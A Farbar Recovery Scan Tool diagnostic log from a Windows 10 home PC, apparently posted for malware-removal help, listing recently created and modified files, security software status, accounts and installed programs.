    2017-01-10 22:47 - 2016-12-21 01:56 - 00936960 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll
    2017-01-10 22:47 - 2016-12-21 01:55 - 08129536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
    2017-01-10 22:47 - 2016-12-21 01:55 - 04749312 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
    2017-01-10 22:47 - 2016-12-21 01:53 - 06664192 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspaint.exe
    2017-01-10 22:47 - 2016-12-21 01:51 - 08075776 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
    2017-01-10 22:47 - 2016-12-21 01:49 - 04149248 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
    2017-01-10 22:47 - 2016-12-21 01:49 - 02691072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
    2017-01-10 22:47 - 2016-12-21 01:49 - 01062912 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
    2017-01-10 22:47 - 2016-12-21 01:47 - 01121280 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
    2017-01-10 22:47 - 2016-12-14 00:34 - 02482280 _____ (Microsoft Corporation) C:\WINDOWS\system32\msmpeg2vdec.dll
    2017-01-10 22:47 - 2016-12-14 00:23 - 00404832 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
    2017-01-10 22:47 - 2016-12-14 00:19 - 00584544 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
    2017-01-10 22:47 - 2016-12-14 00:17 - 00319288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64.dll
    2017-01-10 22:47 - 2016-12-14 00:14 - 01694712 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
    2017-01-10 22:47 - 2016-12-13 23:46 - 00206848 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
    2017-01-10 22:47 - 2016-12-13 23:43 - 00201728 _____ (Microsoft Corporation) C:\WINDOWS\system32\ScDeviceEnum.dll
    2017-01-10 22:47 - 2016-12-13 23:42 - 00352768 _____ (Microsoft Corporation) C:\WINDOWS\system32\cloudAP.dll
    2017-01-10 22:47 - 2016-12-13 23:42 - 00236544 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinSCard.dll
    2017-01-10 22:47 - 2016-12-13 23:40 - 00193536 _____ (Microsoft Corporation) C:\WINDOWS\system32\certprop.dll
    2017-01-10 22:47 - 2016-12-13 23:39 - 00837632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
    2017-01-10 22:47 - 2016-12-13 23:39 - 00290816 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
    2017-01-10 22:47 - 2016-12-13 23:37 - 00090112 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
    2017-01-10 22:47 - 2016-12-13 23:36 - 01002496 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
    2017-01-10 22:47 - 2016-12-13 23:36 - 00539648 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
    2017-01-10 22:47 - 2016-12-13 23:26 - 00932864 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
    2017-01-10 22:47 - 2016-12-13 23:26 - 00869888 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
    2017-01-10 22:47 - 2016-12-13 23:25 - 02009600 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRHInproc.dll
    2017-01-10 22:47 - 2016-12-13 23:24 - 00673792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
    2017-01-10 22:47 - 2016-12-13 23:23 - 03134976 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcore.dll
    2017-01-10 22:47 - 2016-12-13 23:22 - 02317824 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
    2017-01-10 22:47 - 2016-12-13 23:22 - 01513472 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
    2017-01-10 22:47 - 2016-12-13 23:22 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
    2017-01-10 22:47 - 2016-12-13 23:21 - 03616768 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
    2017-01-10 22:46 - 2016-12-21 03:08 - 00245600 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinesam.dll
    2017-01-10 22:46 - 2016-12-21 02:46 - 00624048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
    2017-01-10 22:46 - 2016-12-21 02:42 - 00241504 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
    2017-01-10 22:46 - 2016-12-21 02:15 - 22563840 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
    2017-01-10 22:46 - 2016-12-21 02:05 - 00261632 _____ (Microsoft Corporation) C:\WINDOWS\system32\indexeddbserver.dll
    2017-01-10 22:46 - 2016-12-21 02:00 - 00440320 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhcfg.dll
    2017-01-10 22:46 - 2016-12-21 01:59 - 00883712 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
    2017-01-10 22:46 - 2016-12-21 01:58 - 23678464 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
    2017-01-10 22:46 - 2016-12-21 01:57 - 00462336 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhsettingsprovider.dll
    2017-01-10 22:46 - 2016-12-21 01:53 - 04474368 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
    2017-01-10 22:46 - 2016-12-21 01:51 - 05611008 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
    2017-01-10 22:46 - 2016-12-21 01:50 - 01490432 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
    2017-01-10 22:46 - 2016-12-13 23:48 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
    2017-01-10 22:46 - 2016-12-13 23:42 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.UI.Logon.ProxyStub.dll
    2017-01-10 22:46 - 2016-12-13 23:41 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
    2017-01-10 22:46 - 2016-12-13 23:40 - 00324096 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
    2017-01-10 22:46 - 2016-12-13 23:40 - 00266752 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConsoleLogon.dll
    2017-01-10 22:46 - 2016-12-13 23:39 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.CredDialogController.dll
    2017-01-10 22:46 - 2016-12-13 23:38 - 17188864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
    2017-01-10 22:46 - 2016-12-13 23:35 - 00600576 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptui.dll
    2017-01-10 22:46 - 2016-12-13 23:24 - 01005568 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3D12.dll
    2017-01-10 22:46 - 2016-12-13 23:23 - 01231872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
    2017-01-10 22:46 - 2016-12-13 23:22 - 00707584 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
    2017-01-10 22:45 - 2016-12-21 02:37 - 00455520 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
    2017-01-10 22:45 - 2016-12-21 01:54 - 05511680 _____ (Microsoft Corporation) C:\WINDOWS\system32\aclui.dll
    2017-01-10 22:45 - 2016-12-21 01:53 - 01692672 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
    2017-01-10 22:45 - 2016-12-21 01:51 - 02275840 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
    2017-01-10 22:45 - 2016-12-14 00:41 - 01235296 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
    2017-01-10 22:45 - 2016-12-14 00:41 - 00590960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
    2017-01-10 22:45 - 2016-12-14 00:33 - 01356864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipUp.exe
    2017-01-10 22:45 - 2016-12-14 00:18 - 00715104 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhdmp.sys
    2017-01-10 22:45 - 2016-12-14 00:18 - 00335712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
    2017-01-10 22:45 - 2016-12-14 00:14 - 00418952 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
    2017-01-10 22:45 - 2016-12-14 00:14 - 00089416 _____ (Microsoft Corporation) C:\WINDOWS\system32\remoteaudioendpoint.dll
    2017-01-10 22:45 - 2016-12-13 23:38 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll
    2017-01-10 22:45 - 2016-11-02 06:00 - 00534096 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
    2017-01-10 22:45 - 2016-11-02 05:28 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll
    2017-01-10 22:45 - 2016-11-02 05:22 - 00337920 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
    2017-01-10 22:45 - 2016-11-02 05:21 - 00942080 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
    2017-01-10 17:38 - 2017-01-10 17:38 - 00176064 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMChameleon.sys
    2017-01-10 17:37 - 2017-01-31 23:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
    2017-01-10 17:37 - 2017-01-24 22:12 - 00091584 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
    2017-01-10 17:37 - 2017-01-21 21:09 - 00102856 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
    2017-01-10 17:37 - 2017-01-20 07:47 - 00077416 _____ C:\WINDOWS\system32\Drivers\mbae64.sys
    2017-01-10 17:37 - 2017-01-10 17:37 - 00001919 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
    2017-01-10 17:37 - 2017-01-10 17:37 - 00000000 ____D C:\Program Files\Malwarebytes
    2017-01-10 08:16 - 2017-01-31 15:36 - 00000000 ____D C:\Users\Joseph\Desktop\Marina
    2017-01-08 19:56 - 2017-01-31 20:39 - 00000000 ___RD C:\Users\Joseph\Creative Cloud Files
    2017-01-08 19:53 - 2017-01-08 19:53 - 00000000 ____D C:\Users\Joseph\AppData\Local\CEF
    2017-01-08 19:49 - 2017-01-08 19:49 - 00804440 _____ (Adobe Systems Incorporated) C:\Users\Joseph\Downloads\CreativeCloudSet-Up (1).exe
    2017-01-06 16:13 - 2017-01-06 16:13 - 00000000 ____D C:\Program Files\Common Files\Intel
    2017-01-06 16:13 - 2017-01-06 16:13 - 00000000 ____D C:\Program Files (x86)\Cisco
    2017-01-04 16:04 - 2017-01-04 16:04 - 00313276 _____ C:\Users\Joseph\Downloads\reciept2.pdf
    2017-01-04 16:04 - 2017-01-04 16:04 - 00273789 _____ C:\Users\Joseph\Downloads\reciept1.pdf
    2017-01-03 19:19 - 2017-01-24 21:11 - 00000000 ____D C:\Users\Joseph\Desktop\Joe
    2017-01-02 16:12 - 2017-01-31 23:03 - 00087912 _____ C:\Users\Joseph\Desktop\A79BE330
    2017-01-02 16:12 - 2017-01-31 07:35 - 00087850 _____ C:\Users\Joseph\Desktop\Annual Budget - 2017.xlsx
     
    ==================== One Month Modified files and folders ========
     
    (If an entry is included in the fixlist, the file/folder will be moved.)
     
    2017-02-01 17:45 - 2016-09-23 17:44 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Skype
    2017-02-01 17:43 - 2016-07-16 06:47 - 00000000 ___HD C:\Program Files\WindowsApps
    2017-02-01 17:43 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\AppReadiness
    2017-02-01 17:33 - 2016-09-29 08:55 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
    2017-02-01 17:17 - 2016-09-29 09:03 - 01320142 _____ C:\WINDOWS\system32\PerfStringBackup.INI
    2017-02-01 17:09 - 2016-09-29 08:58 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
    2017-02-01 17:09 - 2016-09-22 19:48 - 00251848 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
    2017-02-01 17:09 - 2016-09-22 19:41 - 00000000 __SHD C:\Users\Joseph\IntelGraphicsProfiles
    2017-02-01 17:08 - 2016-09-29 09:24 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
    2017-02-01 17:08 - 2016-07-16 01:04 - 00524288 _____ C:\WINDOWS\system32\config\BBI
    2017-02-01 11:20 - 2016-09-29 09:03 - 00000000 ____D C:\Users\Joseph
    2017-02-01 08:53 - 2016-10-29 21:04 - 00000000 ____D C:\Users\Joseph\AppData\Local\Adobe
    2017-02-01 08:51 - 2016-07-16 01:04 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
    2017-02-01 08:45 - 2016-07-16 06:45 - 00000000 ____D C:\WINDOWS\INF
    2017-01-31 23:31 - 2016-10-18 20:11 - 00000000 ____D C:\Users\Joseph\AppData\Local\ElevatedDiagnostics
    2017-01-31 23:05 - 2016-09-23 11:59 - 00000368 _____ C:\WINDOWS\Tasks\HPCeeScheduleForJoseph.job
    2017-01-31 21:05 - 2016-09-29 09:23 - 00003264 _____ C:\WINDOWS\System32\Tasks\HPCeeScheduleForJoseph
    2017-01-31 20:50 - 2016-10-09 20:00 - 00000000 ____D C:\Program Files (x86)\ShopTracker
    2017-01-31 20:39 - 2016-10-29 21:14 - 00000000 ____D C:\ProgramData\boost_interprocess
    2017-01-30 21:00 - 2016-10-09 20:01 - 00000000 ____D C:\Users\Joseph\AmazonMeter
    2017-01-30 19:43 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\NDF
    2017-01-28 18:25 - 2016-10-01 10:34 - 00000000 ____D C:\Users\Joseph\Desktop\Bank School
    2017-01-25 00:38 - 2016-07-16 06:36 - 00000000 ____D C:\WINDOWS\CbsTemp
    2017-01-21 21:09 - 2016-09-22 19:47 - 00043968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
    2017-01-21 21:06 - 2016-09-29 08:55 - 00357720 _____ C:\WINDOWS\system32\FNTCACHE.DAT
    2017-01-21 20:43 - 2015-10-30 01:28 - 00000000 ____D C:\Users\Default.migrated
    2017-01-21 09:20 - 2016-09-23 17:44 - 00000000 ____D C:\ProgramData\Skype
    2017-01-20 18:50 - 2016-12-15 07:50 - 00003292 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
    2017-01-20 18:49 - 2016-09-22 19:45 - 00002377 _____ C:\Users\Joseph\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
    2017-01-20 18:49 - 2016-09-22 19:45 - 00000000 ___RD C:\Users\Joseph\OneDrive
    2017-01-19 18:39 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\ELAMBKUP
    2017-01-18 22:54 - 2016-09-28 12:54 - 00000000 ____D C:\Users\Joseph\Documents\UserTesting
    2017-01-18 22:27 - 2016-09-22 20:21 - 00000000 ____D C:\Users\Joseph\AppData\Local\UserTestingPlugin
    2017-01-15 15:52 - 2016-11-09 10:50 - 00000000 ____D C:\Users\Joseph\Documents\TurboTax
    2017-01-15 15:45 - 2016-11-09 10:48 - 00000479 _____ C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
    2017-01-15 15:30 - 2016-11-09 10:49 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Intuit
    2017-01-15 15:30 - 2016-11-09 10:46 - 00000000 ____D C:\Program Files (x86)\TurboTax
    2017-01-15 14:07 - 2016-07-16 06:47 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
    2017-01-15 14:05 - 2016-04-01 13:57 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
    2017-01-13 19:46 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\LiveKernelReports
    2017-01-13 15:56 - 2016-09-29 08:59 - 00168695 _____ C:\WINDOWS\system32\Drivers\rtkhdasetting.zip
    2017-01-13 15:56 - 2016-09-29 08:59 - 00002081 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\B&O Play Audio Control.lnk
    2017-01-13 15:56 - 2016-09-29 08:59 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
    2017-01-13 15:56 - 2016-08-06 13:49 - 00000000 ___HD C:\Program Files (x86)\Temp
    2017-01-13 15:53 - 2016-08-06 13:49 - 05523456 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\Drivers\RTKVHD64.sys
    2017-01-13 15:53 - 2016-08-06 13:49 - 03503048 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkApi64.dll
    2017-01-13 15:53 - 2016-08-06 13:49 - 03201376 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RltkAPO64.dll
    2017-01-13 15:53 - 2016-08-06 13:49 - 02995000 _____ (DTS, Inc.) C:\WINDOWS\system32\slcnt64.dll
    2017-01-13 15:53 - 2016-08-06 13:49 - 02839520 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\RtlExUpd.dll
    2017-01-13 15:53 - 2016-08-06 13:49 - 00192976 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkCfg64.dll
    2017-01-13 15:53 - 2016-08-06 13:49 - 00023688 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkCoLDR64.dll
    2017-01-13 15:53 - 2016-04-01 13:31 - 00000000 ____D C:\SWSetup
    2017-01-12 11:14 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\rescache
    2017-01-11 00:22 - 2015-11-02 13:02 - 00000000 __RHD C:\Users\Public\AccountPictures
    2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
    2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
    2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\oobe
    2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\ShellExperiences
    2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\Provisioning
    2017-01-10 23:28 - 2016-09-23 16:25 - 00000000 ____D C:\WINDOWS\system32\MRT
    2017-01-10 23:25 - 2016-09-23 16:25 - 135657872 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
    2017-01-10 17:37 - 2016-09-22 19:47 - 00000000 ____D C:\ProgramData\Malwarebytes
    2017-01-08 21:19 - 2016-09-22 19:41 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Adobe
    2017-01-08 20:09 - 2016-10-29 21:27 - 00000000 ____D C:\Program Files\Adobe
    2017-01-08 20:02 - 2016-10-29 21:33 - 00000000 ____D C:\ProgramData\regid.1986-12.com.adobe
    2017-01-08 19:54 - 2016-10-29 21:14 - 00000000 __RHD C:\Users\Joseph\[email protected] Creative Cloud Files
    2017-01-08 19:52 - 2016-10-29 21:10 - 00001309 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk
    2017-01-08 19:52 - 2016-10-29 21:10 - 00001297 _____ C:\Users\Public\Desktop\Adobe Creative Cloud.lnk
    2017-01-08 19:49 - 2016-09-22 19:41 - 00000000 ____D C:\Users\Joseph\AppData\Local\VirtualStore
    2017-01-06 16:13 - 2016-09-29 08:57 - 00000000 ____D C:\Program Files (x86)\Intel
    2017-01-06 16:13 - 2016-09-22 19:54 - 00000000 ____D C:\ProgramData\Intel
    2017-01-06 16:11 - 2016-09-29 08:58 - 00000000 ____D C:\Program Files\Intel
    2017-01-02 18:29 - 2016-10-02 22:40 - 00046599 _____ C:\Users\Joseph\Desktop\Expense Tracking.xlsx
     
    ==================== Files in the root of some directories =======
     
    2017-01-20 13:28 - 2017-01-20 13:28 - 0000184 _____ () C:\Users\Joseph\AppData\Roaming\6ov.vbs
    2017-01-31 23:27 - 2017-01-31 23:27 - 0000017 _____ () C:\Users\Joseph\AppData\Local\resmon.resmoncfg
    2017-02-01 08:27 - 2017-02-01 08:27 - 0047353 _____ () C:\ProgramData\agent.1485955633.bdinstall.bin
    2016-11-30 08:18 - 2016-11-30 08:18 - 0000057 _____ () C:\ProgramData\Ament.ini
    2017-02-01 08:47 - 2017-02-01 08:47 - 0403991 _____ () C:\ProgramData\cl.1485956260.bdinstall.bin
    2017-02-01 08:52 - 2017-02-01 08:52 - 0056949 _____ () C:\ProgramData\dm.1485956857.bdinstall.bin
    2017-02-01 16:52 - 2017-02-01 16:52 - 0040137 _____ () C:\ProgramData\dm.1485985887.bdinstall.bin
    2016-11-09 10:48 - 2017-01-15 15:45 - 0000479 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
     
    ==================== Bamital & volsnap ======================
     
    (There is no automatic fix for files that do not pass verification.)
     
    C:\WINDOWS\system32\winlogon.exe => File is digitally signed
    C:\WINDOWS\system32\wininit.exe => File is digitally signed
    C:\WINDOWS\explorer.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
    C:\WINDOWS\system32\svchost.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
    C:\WINDOWS\system32\services.exe => File is digitally signed
    C:\WINDOWS\system32\User32.dll => File is digitally signed
    C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
    C:\WINDOWS\system32\userinit.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
    C:\WINDOWS\system32\rpcss.dll => File is digitally signed
    C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
    C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
    C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
     
    LastRegBack: 2017-01-23 10:44
     
    ==================== End of FRST.txt ============================
     
    Addition:
     
    Additional scan result of Farbar Recovery Scan Tool (x64) Version: 29-01-2017
    Ran by Joseph (01-02-2017 17:47:43)
    Running from C:\Users\Joseph\Downloads
    Windows 10 Home Version 1607 (X64) (2016-09-29 14:26:58)
    Boot Mode: Normal
    ==========================================================
     
     
    ==================== Accounts: =============================
     
    Administrator (S-1-5-21-2731509489-3924948741-1415746157-500 - Administrator - Disabled)
    DefaultAccount (S-1-5-21-2731509489-3924948741-1415746157-503 - Limited - Disabled)
    Guest (S-1-5-21-2731509489-3924948741-1415746157-501 - Limited - Disabled)
    Joseph (S-1-5-21-2731509489-3924948741-1415746157-1001 - Administrator - Enabled) => C:\Users\Joseph
     
    ==================== Security Center ========================
     
    (If an entry is included in the fixlist, it will be removed.)
     
    AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    AV: Bitdefender Antivirus (Enabled - Out of date) {3FB17364-4FCC-0FA7-6BBF-973897395371}
    AS: Bitdefender Antispyware (Enabled - Out of date) {84D09280-69F6-0029-510F-AC4AECBE19CC}
    AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    FW: Bitdefender Firewall (Enabled) {078AF241-05A3-0EFF-40E0-3E0D69EA140A}
     
    ==================== Installed Programs ======================
     
    (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
     
    12 Labours of Hercules III: Girl Power (x32 Version: 3.0.2.118 - WildTangent) Hidden
    Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.9.5.353 - Adobe Systems Incorporated)
    Adobe Lightroom (HKLM-x32\...\{8048A5DF-8A70-5BE1-954B-E0FDE1BD0D0D}) (Version: 6.8 - Adobe Systems Incorporated)
    Adobe Shockwave Player 12.2 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.2.5.195 - Adobe Systems, Inc.)
    Awakening: The Dreamless Castle (x32 Version: 3.0.2.51 - WildTangent) Hidden
    Azkend 2: The World Beneath (x32 Version: 2.2.0.98 - WildTangent) Hidden
    Barn Yarn Collector's Edition (x32 Version: 3.0.2.48 - WildTangent) Hidden
    Bitdefender Agent (HKLM\...\Bitdefender Agent) (Version: 21.0.21.970 - Bitdefender)
    Bitdefender Device Management (HKLM\...\Bitdefender Device Management) (Version: 21.0.23.1101 - Bitdefender)
    Bitdefender Total Security 2017 (HKLM\...\Bitdefender) (Version: 21.0.23.1101 - Bitdefender)
    Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
    Citrix Receiver 4.5 (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 14.5.0.10018 - Citrix Systems, Inc.)
    CyberLink Power Media Player 14 (HKLM-x32\...\{32C8E300-BDB4-4398-92C2-E9B7D8A233DB}) (Version: 14.0.4.6527 - CyberLink Corp.)
    CyberLink PowerDirector 12 (HKLM-x32\...\InstallShield_{E1646825-D391-42A0-93AA-27FA810DA093}) (Version: 12.0.6.4925 - CyberLink Corp.)
    CyberLink PowerDirector 12 (Version: 12.0.6.4925 - CyberLink Corp.) Hidden
    Delicious: Emily's Wonder Wedding Premium Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
    DisableMSDefender (Version: 1.0.0 - Hewlett-Packard Company) Hidden
    Dropbox 25 GB (HKLM-x32\...\{736A97C6-8766-3699-84A9-71736C5E0CE3}) (Version: 3.1.11.0 - Dropbox, Inc.)
    Dropbox Update Helper (x32 Version: 1.3.59.1 - Dropbox, Inc.) Hidden
    Energy Star (HKLM\...\{5CB22648-35F8-41BC-9C35-1E41FE6E12A5}) (Version: 1.1.1 - HP Inc.)
    Entwined: The Perfect Murder (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Google Chrome (HKLM-x32\...\Google Chrome) (Version: 55.0.2883.87 - Google Inc.)
    Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
    Green City: Go South (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Home Makeover (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Hoyle Illusions Mahjongg (x32 Version: 3.0.2.59 - WildTangent) Hidden
    HP 3D DriveGuard (HKLM-x32\...\{E8D0E2B8-B64B-44BC-8E01-00DDACBDF78A}) (Version: 6.0.28.1 - Hewlett-Packard Company)
    HP CoolSense (HKLM-x32\...\{0C723C74-62DF-4B35-9490-A207546D866D}) (Version: 2.21.4 - HP Inc.)
    HP Documentation (HKLM\...\HP_Documentation) (Version: 1.0.0.1 - HP Inc.)
    HP ePrint SW (HKLM-x32\...\{88970959-baf7-4864-a39a-69a58e8ae5cf}) (Version: 5.0.18701 - HP)
    HP Photosmart 6520 series Basic Device Software (HKLM\...\{1151BCF8-3246-4E34-9C17-22E66318C41C}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
    HP Photosmart 6520 series Help (HKLM-x32\...\{D3293275-1002-41F5-BC37-099B4251FF5B}) (Version: 28.0.0 - Hewlett Packard)
    HP Photosmart 6520 series Product Improvement Study (HKLM\...\{F144E07C-4019-4092-BE25-B57819C97D2F}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
    HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.8318.5320 - Hewlett-Packard)
    HP Support Assistant (HKLM-x32\...\{78E2C850-ADA6-420D-BA35-2F4A9BE733CC}) (Version: 8.3.50.9 - HP)
    HP Support Solutions Framework (HKLM-x32\...\{5F084DD8-AF2C-4004-9C92-820C32E4BD55}) (Version: 12.5.32.203 - HP)
    HP Sure Connect (HKLM-x32\...\{6468C4A5-E47E-405F-B675-A70A70983EA6}) (Version: 1.0.0.27 - HP Inc.)
    HP System Event Utility (HKLM-x32\...\{09D0DB68-90EA-4015-983E-A0BD777D5A02}) (Version: 1.4.10 - HP Inc.)
    HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
    HP Welcome (HKLM\...\HPWelcome) (Version: 1.0 - HP Inc.)
    HP Wireless Button Driver (HKLM-x32\...\{AF4C5F64-4E6A-438B-9832-8BDEE0E7B43D}) (Version: 1.1.17.1 - HP)
    IGT Slots Fire Rubies (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Imperial Island: Birth of an Empire (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Intel® Chipset Device Software (x32 Version: 10.1.1.9 - Intel® Corporation) Hidden
    Intel® Dynamic Platform and Thermal Framework (HKLM-x32\...\{654EE65D-FAA4-4EA6-8C07-DC94E6A304D4}) (Version: 8.1.10608.329 - Intel Corporation)
    Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.2.1183 - Intel Corporation)
    Intel® PRO/Wireless Driver (HKLM\...\{edcc2d98-dba0-4914-ba46-6dae7352cea9}) (Version: 19.20.0000.5007 - Intel Corporation)
